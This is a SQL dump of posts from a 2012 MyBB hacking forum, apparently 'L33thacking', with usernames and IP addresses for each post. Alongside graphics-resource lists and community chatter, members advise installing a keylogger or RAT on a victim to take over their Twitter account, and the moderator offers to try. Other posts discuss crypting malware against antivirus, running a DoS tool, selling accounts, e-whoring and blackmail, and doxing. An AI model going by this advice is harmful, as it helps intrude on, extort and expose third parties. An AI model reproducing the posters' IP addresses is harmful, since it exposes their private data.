Tutorials)\r\nhttp://dr-photoshop.com/\r\nhttp://www.showandtell-graphics.com/\r\nhttp://www.visualdesigncore.com/tutorials/\r\nhttp://www.heathrowe.com/\r\nhttp://www.tutorialized.com\r\nhttp://www.photoscape.org/\r\nhttp://www.pixel2life.com/\r\nhttp://www.tutorialized.com/tutorials/Photoshop/1\r\nhttp://www.planetphotoshop.com/\r\nhttp://www.photoshopcafe.com/\r\nhttp://www.entensity.net/\r\nhttp://www.mlhotw.com/\r\nhttp://www.photoshoproadmap.com/\r\nhttp://www.photoshopuser.com/\r\nhttp://home.no.net/poek/\r\nhttp://www.somethingleet.com/\r\nhttp://www.actionfx.com/\r\nhttp://dazulu.r4ge.com/\r\nhttp://www.genarts.com/sapphire-ae-tutorial.html\r\nhttp://tutorial-index.com/\r\nhttp://www.photoshopsupport.com/tutoriaÃ...op-10.html\r\nhttp://www.photoshopsupport.com\r\nhttp://www.tutorialkit.com/\r\nhttp://www.grafx-design.com/phototut.html\r\nhttp://www.photoshopstar.com/\r\nhttp://www.sketchpad.net/photoshp.htm\r\nhttp://www.tutorialgod.com/\r\nhttp://www.hypergurl.com/index.html\r\nhttp://www.tutvid.com\r\n\r\nStocks/renders:\r\n\r\nhttp://www.sxc.hu/\r\nhttp://www.planetrenders.net\r\nhttp://www.clantemplates.com/renders\r\nhttp://www.gamewallpapers.com\r\nhttp://www.renders-graphiques.fr/\r\n\r\nBrushes/Textures:\r\nhttp://www.deviantart.com\r\nhttp://photoshopbrushes.com/brushes.htm\r\nhttp://www.psbrushes.net/\r\nhttp://www.dr-depot.com\r\nhttp://deviantart.com/\r\nhttp://brushes.echoica.net/\r\nhttp://www.misprintedtype.com/\r\nhttp://qtone.sidez.net/\r\nhttp://www.magurno.com/\r\nhttp://www.brusheezy.com\r\nhttp://www.psbrushes.net/\r\n\r\nSkins:\r\n\r\nhttp://www.clantemplates.com/\r\nhttp://www.freewebtemplates.com/\r\n\r\nFonts:\r\n\r\nhttp://dafont.com\r\nhttp://www.1001freefonts.com/\r\nhttp://www.coffeecup.com/freestuff/fonts/\r\nhttp://www.acidfonts.com/\r\nhttp://www.gimmefonts.com/\r\nhttp://simplythebest.net/fonts/\r\nhttp://www.fontshop.com/freefonts/\r\nhttp://www.smackbomb.com/famousfonts/\r\nhttp://www.fontspace.com/\r\nhttp://www.fontparade.com\r\nhttp://www.urbanfonts.com/\r\n\r\nImage Editor:\r\n\r\nhttp://www.lunapic.com/editor\r\nhttp://www.puricute.com/\r\nhttp://www.photoscape.org\r\n\r\nIMAGE HOSTING:\r\n\r\nhttp://imagevenue.com/\r\nhttp://www.imagehosting.com/\r\nhttp://www.picoodle.com/\r\nhttp://imageshack.us/\r\nhttp://tinypic.com/\r\nhttp://www.freeimagehosting.net/\r\nhttp://www.supload.com/\r\nhttp://photobucket.com/\r\nhttp://www.picgames.com/forum/myspace-image-help.php\r\nhttp://www.theimagehosting.com/\r\nhttp://www.bigoo.ws/\r\nhttp://www.turboimagehost.com/\r\n\r\nEverything:\r\n\r\nhttp://www.tutorialkit.com/\r\nhttp://officialpsds.com/\r\nhttp://www.2dvalley.com/ \r\n\r\n[color=#DAA520][b]Credits to :[/b][/color] Anonymouse', '119.154.17.141', '2006585741', '1', '0', '54', '1345942389', '1', '5f4ae24a216f72a850d61059ce60f77e', '0', '1345942389'); INSERT INTO mybb_posts VALUES('984', '230', '944', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345942431', '[quote=\'iTzIpod\' pid=\'944\' dateline=\'1345922950\']\r\n[quote=\'Sin Cara\' pid=\'934\' dateline=\'1345918850\']\r\n[quote=\'iTzIpod\' pid=\'933\' dateline=\'1345918590\']\r\nAlright\r\nThere are probably more.\r\nSome links are unknown Some links are broken. \r\n[Spoiler]\r\nhttp://www.ajoyfulheart.com/pspphot...shresources.htm\r\nhttp://www.smashingmagazine.com/2007/01%C3%83...tutorials/\r\nhttp://graphicssoft.about.com/od/illust%C3%83...lrings.htm\r\nhttp://www.adobe.com/support/fireworks/%C3%83...index.html\r\nhttp://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts\r\n[/Spoiler]\r\n[/quote]\r\n\r\nThe links are dead because of server is down.\r\n[/quote]\r\nAdobe is down? Are you sure? \r\n\r\nIt is up. It doesn\'t work because of the ... in the URL. -.- Fix them\r\n[/quote]\r\n\r\nThe dead links are removed now ;)', '119.154.77.132', '2006601092', '1', '0', '0', '0', '1', 'c59266d45e27a61110f3c230758be23e', '0', '0'); INSERT INTO mybb_posts VALUES('926', '230', '925', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '82', 'iTzIpod', '1345917879', 'Fail copy and paste. Some of the links have the .... in it. So you have to fix them ^_^.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc9179d0196aa46c68133db92c772fa9', '0', '0'); INSERT INTO mybb_posts VALUES('928', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345918241', 'Right after this stopped working i got it working again. But it stopped working again O.o', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'b2cd2bbaee93a05dfd0a612033e771c2', '0', '0'); INSERT INTO mybb_posts VALUES('929', '231', '0', '4', 'Sup', '0', '127', 'Eucliwood', '1345918274', 'yo, im Eu and i like potatoes', '88.90.14.9', '1482296841', '1', '0', '0', '0', '1', '85f88cd4916b11b7fdad359ceccaf510', '0', '0'); INSERT INTO mybb_posts VALUES('930', '212', '909', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1345918349', '[quote=\'Sin Cara\' pid=\'909\' dateline=\'1345906750\']\nSo are you going to make it official????\n[/quote]\nt3h jok3r is probably busy today. \n\nOT: \n[b]Name of group:[/b] Unique\n[b]Group Description:[/b] We are Unique. We are a HQ Group. And we have the best HQ members. \n[b]Group Userbar:[/b] [img]http://i.imgur.com/rKDZL.png[/img]\n[b]Forum Name:[/b] Unique Headquarters\n[b]Forum Icon(34x34):[/b] [img]http://www.blackboard.com/resources/mobile/images/coursemap_icons/MLForumsIcon.png[/img]\n[b]Why LH should make this group official:[/b] LH should make this group official because this group will be an active group with HQ posts. Only LH\'s finest members can join. It is also an invite only group. And we will do giveaways and contests for the community.We will also contribute to the forum and its activity.', '24.212.197.164', '416597412', '1', '0', '82', '1345918453', '1', '639e5b1c87f5cd801d4c548d14f0779b', '0', '1345918453'); INSERT INTO mybb_posts VALUES('931', '231', '929', '4', 'RE: Sup', '0', '67', 'HoverCatz', '1345918468', 'Hey, nice to meet u. Welcome to L33thacking :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'fdf8e810cc16a3c347b9aea458692714', '0', '0'); INSERT INTO mybb_posts VALUES('958', '231', '929', '4', 'RE: Sup', '0', '1', 't3h jok3r', '1345936312', 'Welcome to L33THacking.\n\nWe do not not allow adult content in Signatures, Posts or via Profile. Your signature privilege has been suspended for two days.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'a4b7feb621cd48bdbdbc3625bd63d9e1', '0', '0'); INSERT INTO mybb_posts VALUES('933', '230', '925', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '82', 'iTzIpod', '1345918590', 'Alright\nThere are probably more.\nSome links are unknown Some links are broken. \n[Spoiler]\nhttp://www.ajoyfulheart.com/pspphot...shresources.htm\nhttp://www.smashingmagazine.com/2007/01%C3%83...tutorials/\nhttp://graphicssoft.about.com/od/illust%C3%83...lrings.htm\nhttp://www.adobe.com/support/fireworks/%C3%83...index.html\nhttp://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts\n[/Spoiler]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44a4bbfe36b2843fb6ccadaa9724fd85', '0', '0'); INSERT INTO mybb_posts VALUES('934', '230', '933', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345918850', '[quote=\'iTzIpod\' pid=\'933\' dateline=\'1345918590\']\r\nAlright\r\nThere are probably more.\r\nSome links are unknown Some links are broken. \r\n[Spoiler]\r\nhttp://www.ajoyfulheart.com/pspphot...shresources.htm\r\nhttp://www.smashingmagazine.com/2007/01%C3%83...tutorials/\r\nhttp://graphicssoft.about.com/od/illust%C3%83...lrings.htm\r\nhttp://www.adobe.com/support/fireworks/%C3%83...index.html\r\nhttp://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts\r\n[/Spoiler]\r\n[/quote]\r\n\r\nThe links are dead because of server is down.', '173.245.53.115', '-1376438925', '1', '0', '0', '0', '1', 'e59551697daf449d257f9b5e9c744d72', '0', '0'); INSERT INTO mybb_posts VALUES('935', '231', '929', '4', 'RE: Sup', '0', '82', 'iTzIpod', '1345918976', 'Hey. Welcome to LH! Once a L33t, Always a L33t. That\'s our motto. \n\nEnjoy your stay! Please be active and read and stick to the rules. It will make everyone\'s life easier. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3333f31f89fb31c79a3159146173bce9', '0', '0'); INSERT INTO mybb_posts VALUES('936', '228', '921', '12', 'RE: [TUT] A complete guide to RAT', '0', '55', 'Baws', '1345919168', 'Nice, it\'d be better if you mention there are other known RATs such as Darkcomet which is stable but a discontinued project, and Blackshades which is $40 but its owner was arrested so it is most likely under FBI surveillance.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '65645c3b4350605b2d803dc32d600dab', '0', '0'); INSERT INTO mybb_posts VALUES('937', '229', '923', '12', 'RE: How to setup a Keylogger [tut]', '0', '55', 'Baws', '1345919217', 'You also need to crypt the server so that antiviruses won\'t catch it.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '09a3d6bd23216ee3d66e95ad39d25493', '0', '0'); INSERT INTO mybb_posts VALUES('938', '2', '922', '34', 'RE: Userbar tut', '0', '55', 'Baws', '1345919297', '[quote=\'iTzIpod\' pid=\'922\' dateline=\'1345912169\']\r\n[img]http://i.imgur.com/rKDZL.png[/img]\r\n\r\nMy results. Changes some stuff up. \r\nThis will probably be my Usergroup Name.\r\n\r\nUnique?\r\n[/quote]\r\n\r\nIn my opinion the text is kind of hard to read.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'c2f67850b68e47789419b0fcb90aeda4', '0', '0'); INSERT INTO mybb_posts VALUES('939', '228', '936', '12', 'RE: [TUT] A complete guide to RAT', '0', '54', 'Sin Cara', '1345919307', '[quote=\'Baws\' pid=\'936\' dateline=\'1345919168\']\r\nNice, it\'d be better if you mention there are other known RATs such as Darkcomet which is stable but a discontinued project, and Blackshades which is $40 but its owner was arrested so it is most likely under FBI surveillance.\r\n[/quote]\r\n\r\nThese are the basic rats ;)', '173.245.53.115', '-1376438925', '1', '0', '0', '0', '1', '343acad8dd7b1b6e534f4f10fefb92f2', '0', '0'); INSERT INTO mybb_posts VALUES('940', '224', '907', '34', 'RE: [Tutorial][Leaked] Metroid Signature Tutorial', '0', '55', 'Baws', '1345919393', 'I\'m not sure if this is against the rules, or a nice thing to do.\n\nIt does say DO NOT RIP.\n\nOther than that, thanks for the post.', '98.176.49.100', '1655714148', '0', '0', '55', '1345919408', '1', '0ce0678dd85921755e7a94c725a8ae96', '0', '1345919408'); INSERT INTO mybb_posts VALUES('941', '227', '920', '13', 'RE: hack twitter?', '0', '67', 'HoverCatz', '1345920388', 'I dont think its possible for people like us :S u gotta be like Super Mega ultra haxor', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '16b50fd070fdc172e8daa7c6281ef3d8', '0', '0'); INSERT INTO mybb_posts VALUES('942', '224', '940', '34', 'RE: [Tutorial][Leaked] Metroid Signature Tutorial', '0', '82', 'iTzIpod', '1345922749', '[quote=\'Baws\' pid=\'940\' dateline=\'1345919393\']\r\nI\'m not sure if this is against the rules, or a nice thing to do.\r\n\r\nIt does say DO NOT RIP.\r\n\r\nOther than that, thanks for the post.\r\n[/quote]\r\n\r\nI didn\'t really rip it. I did say that it was leaked in the title. And also I gave the link to the Deviant Art page.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '633242ddd1949408567d3497bc4f1235', '0', '0'); INSERT INTO mybb_posts VALUES('943', '2', '938', '34', 'RE: Userbar tut', '0', '82', 'iTzIpod', '1345922876', '[quote=\'Baws\' pid=\'938\' dateline=\'1345919297\']\r\n[quote=\'iTzIpod\' pid=\'922\' dateline=\'1345912169\']\r\n[img]http://i.imgur.com/rKDZL.png[/img]\r\n\r\nMy results. Changes some stuff up. \r\nThis will probably be my Usergroup Name.\r\n\r\nUnique?\r\n[/quote]\r\n\r\nIn my opinion the text is kind of hard to read.\r\n[/quote]\r\n\r\nI agree with you. I failed on this :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e8fd457b7bfee8f9c252bf0f71cfb154', '0', '0'); INSERT INTO mybb_posts VALUES('944', '230', '934', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '82', 'iTzIpod', '1345922950', '[quote=\'Sin Cara\' pid=\'934\' dateline=\'1345918850\']\r\n[quote=\'iTzIpod\' pid=\'933\' dateline=\'1345918590\']\r\nAlright\r\nThere are probably more.\r\nSome links are unknown Some links are broken. \r\n[Spoiler]\r\nhttp://www.ajoyfulheart.com/pspphot...shresources.htm\r\nhttp://www.smashingmagazine.com/2007/01%C3%83...tutorials/\r\nhttp://graphicssoft.about.com/od/illust%C3%83...lrings.htm\r\nhttp://www.adobe.com/support/fireworks/%C3%83...index.html\r\nhttp://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts\r\n[/Spoiler]\r\n[/quote]\r\n\r\nThe links are dead because of server is down.\r\n[/quote]\r\nAdobe is down? Are you sure? \r\n\r\nIt is up. It doesn\'t work because of the ... in the URL. -.- Fix them', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eab1949bf1f97b0520b200cc5dc4e34c', '0', '0'); INSERT INTO mybb_posts VALUES('945', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '127', 'Eucliwood', '1345924608', 'i didnt get it to work, i tryed take down a site but when i started the attack it seems like i ddosed myself cause i would not acces any website, or send messages to people on skype and i was inlogged on a game and i disconnected.', '88.90.14.9', '1482296841', '1', '0', '0', '0', '1', 'f4e4b443f1534e45dae5741e9c22629c', '0', '0'); INSERT INTO mybb_posts VALUES('946', '229', '923', '12', 'RE: How to setup a Keylogger [tut]', '0', '53', 'sirchamp', '1345925884', 'It isnt necesary but I advise it.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '7c5c69c0f6e89a0b89e0e905052ea109', '0', '0'); INSERT INTO mybb_posts VALUES('951', '232', '949', '50', 'RE: Triple H', '0', '1', 't3h jok3r', '1345934731', '1. There\'s no need for you to tell us what to do, we are moderating LH for a reason and have a right to take an action on our discretion.\n2. There was no need for you to promote HF and ubers on his virus o matic thread.\n3. Triple H was given the right to redistribute the virus o matic program.\n\nThanks for your report though, you could have also reported it with the report button. We will issue him a warning, a BAN is too much.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '0fd3eb4af8aa03277849cfa7d5b18b55', '0', '0'); INSERT INTO mybb_posts VALUES('948', '227', '920', '13', 'RE: hack twitter?', '0', '53', 'sirchamp', '1345926941', 'Well you would have to hack his account. Just setup a keylogger or a RAT on his computer.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '04226065bc139e71d42764ff389c35e1', '0', '0'); INSERT INTO mybb_posts VALUES('949', '232', '0', '50', 'Triple H', '0', '53', 'sirchamp', '1345927812', 'Triple H is making lots of threads and tutorials lately but then I saw that nearly all of them are copied of other sites. He isnt giving any credits to the real thread maker! He is just copying the exact same thing and pasting it here. Something has to be done about that. *cough ban cough*', '188.155.56.90', '-1130678182', '1', '0', '53', '1345927971', '1', 'e723f2d08f9e09a47c56e84d3839ce64', '0', '1345927971'); INSERT INTO mybb_posts VALUES('950', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '67', 'HoverCatz', '1345929624', 'Joker this is a Dos, not DDoS :) Correct the Title', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '7fe1fc794eaa0dee41256cb858933022', '0', '0'); INSERT INTO mybb_posts VALUES('952', '140', '357', '19', '[Junk]???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '1', 't3h jok3r', '1345934849', 'This thread has been junked.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('953', '213', '878', '58', 'RE: What group(s) would you like to see?', '0', '1', 't3h jok3r', '1345935403', '[quote=\'iTzIpod\' pid=\'878\' dateline=\'1345867692\']\r\nI would like to see a comic/troll group. I will be filling out the application tomorrow and post it on the other thread. =]\r\n\r\nWill be looking for a co - leader too.\r\n[/quote]\r\n\r\nTroll groups are not accepted. >:)\r\n\r\nI will take a look at your application in a while.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '6bc3409aa274a323e968cc5356a87719', '0', '0'); INSERT INTO mybb_posts VALUES('954', '29', '945', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '1', 't3h jok3r', '1345935820', '[quote=\'Eucliwood\' pid=\'945\' dateline=\'1345924608\']\r\ni didnt get it to work, i tryed take down a site but when i started the attack it seems like i ddosed myself cause i would not acces any website, or send messages to people on skype and i was inlogged on a game and i disconnected.\r\n[/quote]\r\n\r\nNo, it\'s a DoS tool so it takes packets from your side and sends it to the website. \r\n\r\n\r\n[quote=\'HoverCatz\' pid=\'950\' dateline=\'1345929624\']\r\nJoker this is a Dos, not DDoS :) Correct the Title\r\n[/quote]\r\n\r\n\r\nI wish I had a grammar nazi award. >:)\r\n\r\nI corrected the title, thanks..', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '173f6c547796b5d73559912fd2f5cb73', '0', '0'); INSERT INTO mybb_posts VALUES('955', '227', '948', '13', 'RE: hack twitter?', '0', '1', 't3h jok3r', '1345935903', '[quote=\'sirchamp\' pid=\'948\' dateline=\'1345926941\']\r\nWell you would have to hack his account. Just setup a keylogger or a RAT on his computer.\r\n[/quote]\r\n\r\nThat\'s what I would recommend or Social Engineering. You can also give a password reset a try. Send me a PM with the Twitter, so I could give it a try.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '3ec2bdaa5574e6061ae84e63ffdb3396', '0', '0'); INSERT INTO mybb_posts VALUES('956', '130', '928', '15', 'RE: Skype IP Finder - FREE', '0', '1', 't3h jok3r', '1345935985', '[quote=\'HoverCatz\' pid=\'928\' dateline=\'1345918241\']\r\nRight after this stopped working i got it working again. But it stopped working again O.o\r\n[/quote]\r\n\r\nNo, Yes, No.\r\n\r\nHow did you get it to work?', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '6d9b0110062b236ae1ea7ddb028b290b', '0', '0'); INSERT INTO mybb_posts VALUES('957', '195', '924', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '1', 't3h jok3r', '1345936052', '[quote=\'iTzIpod\' pid=\'924\' dateline=\'1345916462\']\r\nUpdated thread. Added Thread Design. xD I failed at the Contact Info part.\r\n[/quote]\r\n\r\nNice thread design. Mistakes happen, but you patched it.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '4fb0ff8c0680525574b21fdf0bc14589', '0', '0'); INSERT INTO mybb_posts VALUES('959', '225', '914', '7', 'RE: E-whoring Ebook very soon :)', '0', '1', 't3h jok3r', '1345936454', 'Yippee, I\'m so awesome. Thanks.\n\nWill definitely leave a vouch on the thread.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '6de975570c1d9b758328b81e41068e6c', '0', '0'); INSERT INTO mybb_posts VALUES('960', '226', '919', '11', 'RE: A Newbies Guide', '0', '1', 't3h jok3r', '1345936473', 'Stickied. Well-written guide for newbies.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'e0933106a75311f68af238c5655c38ea', '0', '0'); INSERT INTO mybb_posts VALUES('961', '207', '876', '3', 'RE: Suggest awards and apply for awads.', '0', '1', 't3h jok3r', '1345936584', '[quote=\'iTzIpod\' pid=\'876\' dateline=\'1345867358\']\r\n[quote=\'Apathy\' pid=\'869\' dateline=\'1345865316\']\r\nRep whore and post whore sound alright as well as the others but those two are more probable. The first one is not bad either.\r\n[/quote]\r\n\r\nJust saying you wrote awads in the title instead of awards*.\r\n[/quote]\r\n\r\nThanks for letting us know, I have edited the title behalf of Apathy.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '202bdd8f52e3f287add4e82457b95b89', '0', '0'); INSERT INTO mybb_posts VALUES('962', '210', '902', '3', 'RE: Moved Successfully!!!', '0', '1', 't3h jok3r', '1345936684', '[quote=\'duhuh\' pid=\'902\' dateline=\'1345904194\']\r\ni did think it loaded up very quickly just now, good job :)\r\n[/quote]\r\n\r\nYes, that\'s correct. We were receiving a heavy load of DDoS attacks so it got a bit slow. Our new shared hosting is able to keep the site up even with some kinds of DDoS Attacks.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'ac927f38776989f756b43fea52deeb26', '0', '0'); INSERT INTO mybb_posts VALUES('963', '221', '900', '7', 'RE: L33t Hacking Advertisement Video', '0', '1', 't3h jok3r', '1345936818', 'The code you are using is \r\n\r\n[code]\r\n[video=youtube;yA2swuq4YsM]http://www.youtube.com/watch?v=yA2swuq4YsM[/video]\r\n[/code]\r\n\r\nThe code you should be using is\r\n\r\n[code]\r\n[video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video]\r\n[/code]\r\n\r\nSo it will look like\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video]', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '359ecba5460bd512fbedfc756a26bef2', '0', '0'); INSERT INTO mybb_posts VALUES('964', '134', '901', '47', 'RE: Win $10 for referring people', '0', '1', 't3h jok3r', '1345936834', '[quote=\'iTzIpod\' pid=\'901\' dateline=\'1345904080\']\r\nReferred 4 members so far. Will be referring more!\r\n[/quote]\r\n\r\n\r\nThanks for referring. 6 left.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '77fd34d79ca6d520e3653661bc771043', '0', '0'); INSERT INTO mybb_posts VALUES('965', '40', '100', '17', 'RE: 600 pic ewhore pack', '0', '1', 't3h jok3r', '1345936890', 'Lost links :(\n\nSorry man. I will lock the thread due to broken links.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '6251a064c6f0b3183ef361f1fc763f75', '0', '0'); INSERT INTO mybb_posts VALUES('966', '219', '888', '35', 'RE: My Designs', '0', '1', 't3h jok3r', '1345936938', 'I feel jealous now. You have more awards than me.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'f58b1598733a19e7c33eaa195c1aca9f', '0', '0'); INSERT INTO mybb_posts VALUES('967', '26', '881', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '1', 't3h jok3r', '1345937077', '[quote=\'iTzIpod\' pid=\'881\' dateline=\'1345868343\']\r\n[quote=\'t3h jok3r\' pid=\'718\' dateline=\'1345772070\']\r\n[quote=\'iTzIpod\' pid=\'676\' dateline=\'1345752102\']\r\nI never tried E-Whoring before. :/ I want to try it!\r\n[/quote]\r\n\r\nGive it a try, I bet you will succeed and I have been a pro in this shit so you have someone on LH for answers to your question(s)\r\n[/quote]\r\n\r\nThem pedophiles ain\'t buying what I be selling. (They aren\'t giving me that crack.) :/ (Crack=Money) :3\r\n[/quote]\r\n\r\nMaybe they want free porn or maybe you are on saturated sites.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '581f98d37f98a32193c14e1e10c13233', '0', '0'); INSERT INTO mybb_posts VALUES('968', '233', '0', '58', 'Reviewers Group???', '0', '1', 't3h jok3r', '1345937266', 'I was wondering if I should add a reviewers group for all the threads in the marketplace. I mean to review the Secondary and Premium sections and leave their feedbacks. \r\n\r\nWhat do you guys think? \r\n\r\nLeader: I have a leader in mind, but they will be 2-4 people in the group at the moment. So basically 1 leader, 1 co-leader and maybe 2 more members.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '4eee6b74ff1a289872b32375ddd8e31d', '0', '0'); INSERT INTO mybb_posts VALUES('969', '231', '929', '4', 'RE: Sup', '0', '5', 'Timmy', '1345937370', 'Welcome to LH Eucliwood! Hope you like your stay.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '8dffef4370716d3e780854e081d1a078', '0', '0'); INSERT INTO mybb_posts VALUES('970', '216', '858', '52', 'RE: Making a world wide SMS Bomber in VB.net - TUT', '0', '5', 'Timmy', '1345937417', 'I love it, I wish I was a coder, I will try this out some day.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'd4d3abd54fc0df81f59392319040dd40', '0', '0'); INSERT INTO mybb_posts VALUES('971', '104', '251', '33', 'RE: Photoshop vs Gimp', '0', '5', 'Timmy', '1345937474', 'Yup, I also prefer PS. I like many huge companies use it as well.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '97316568c6f7422b9c1e20f57c14b3a9', '0', '0'); INSERT INTO mybb_posts VALUES('972', '214', '856', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '5', 'Timmy', '1345937530', 'LOL I don\'t think pastebin deserves any credits.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'a23286b7865403fc022381206d58452b', '0', '0'); INSERT INTO mybb_posts VALUES('973', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '5', 'Timmy', '1345937646', 'I didn\'t get any PM(s) from you @ssasin.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '2b617aa6bdf8247204c71975046c7315', '0', '0'); INSERT INTO mybb_posts VALUES('974', '220', '899', '55', 'RE: Windows 7 Ultimate', '0', '5', 'Timmy', '1345937741', 'Slow POS? What do you mean also it could be that you are RATTED.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '98c314e711483ff63dfe19aff4ae6c23', '0', '0'); INSERT INTO mybb_posts VALUES('975', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '1', 't3h jok3r', '1345937849', 'Guts? Well OK, I would also think twice before doing this.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'c5db7cc681fafa08b1dd5c73cbac19ec', '0', '0'); INSERT INTO mybb_posts VALUES('976', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '90', 'duhuh', '1345938106', 'kind of a obvious question surely', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '31a0bfbc58da41169019669dffd77078', '0', '0'); INSERT INTO mybb_posts VALUES('977', '234', '0', '17', 'Free E-Whoring packs website plus free PORN', '0', '1', 't3h jok3r', '1345938993', 'This is a forum with adult content. I recommend this site for E-Whoring packs.\r\n\r\nTo get this site, Post below.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'e5b578a1301da8a2ddb0ecf6534e7f8a', '0', '0'); INSERT INTO mybb_posts VALUES('978', '229', '923', '12', 'RE: How to setup a Keylogger [tut]', '0', '1', 't3h jok3r', '1345939494', 'Dude, I seriously thought Neptune Keylogger was made by some unknown person not a company.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '9ddd1bc0287e8fced640d9d3e0534538', '0', '0'); INSERT INTO mybb_posts VALUES('979', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345940570', 'it was when i used the Api u gave :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '40f4ee04906cde0e31822fb70ac7fa58', '0', '0'); INSERT INTO mybb_posts VALUES('980', '235', '0', '48', 'Experiences of MOD', '0', '1', 't3h jok3r', '1345940778', 'I would like to know, how it feels to be a Mod and how\'s everything with your position.\r\n\r\nFeel free to post all your questions below.', '41.174.54.133', '699283077', '1', '0', '0', '0', '1', 'f7662f00914aace19fba78c6758184ea', '0', '0'); INSERT INTO mybb_posts VALUES('981', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '1', 't3h jok3r', '1345940956', 'Oh I see. Finally one of my giveaways were useful for a moment.', '41.174.54.133', '699283077', '1', '0', '0', '0', '1', 'b75f3846611ada0d56c6f7de78f1a942', '0', '0'); INSERT INTO mybb_posts VALUES('982', '197', '898', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1345941178', '[quote=\'iTzIpod\' pid=\'898\' dateline=\'1345900864\']\r\n[quote=\'t3h jok3r\' pid=\'894\' dateline=\'1345898969\']\r\n* t3h jok3r likes the cookie. Can I have more?\r\n[/quote]\r\n\r\n* iTzIpod slaps t3h jok3r with a fish for asking for more cookies without saying please. :p\r\n[/quote]\r\n\r\n/me cries for being slapped with a [s]dick[/s] fish. \r\n\r\nWas it funny? I wish I could get the jokester award :D', '41.174.54.133', '699283077', '1', '0', '0', '0', '1', 'bf0899de0a890dc0843da2acda9fe59a', '0', '0'); INSERT INTO mybb_posts VALUES('983', '217', '882', '24', 'RE: [Fun] Find the SEX of your Computer...!!', '0', '1', 't3h jok3r', '1345941949', 'Mine is female too. Well the voice sounds of a females voice.', '41.174.54.133', '699283077', '1', '0', '0', '0', '1', '3864e004b2bae76154c100655b85af5e', '0', '0'); INSERT INTO mybb_posts VALUES('985', '217', '882', '24', 'RE: [Fun] Find the SEX of your Computer...!!', '0', '54', 'Sin Cara', '1345942529', 'Let\'s check , who has male voice!!', '119.154.77.132', '2006601092', '1', '0', '0', '0', '1', '91ea38e05edf81d82783f0ffa32ea683', '0', '0'); INSERT INTO mybb_posts VALUES('986', '226', '919', '11', 'RE: A Newbies Guide', '0', '54', 'Sin Cara', '1345942581', 'Thanks for the comments ;)', '119.154.77.132', '2006601092', '1', '0', '0', '0', '1', '965b59fb491c17726c2e2fc3dc4228f4', '0', '0'); INSERT INTO mybb_posts VALUES('987', '233', '968', '58', 'RE: Reviewers Group???', '0', '54', 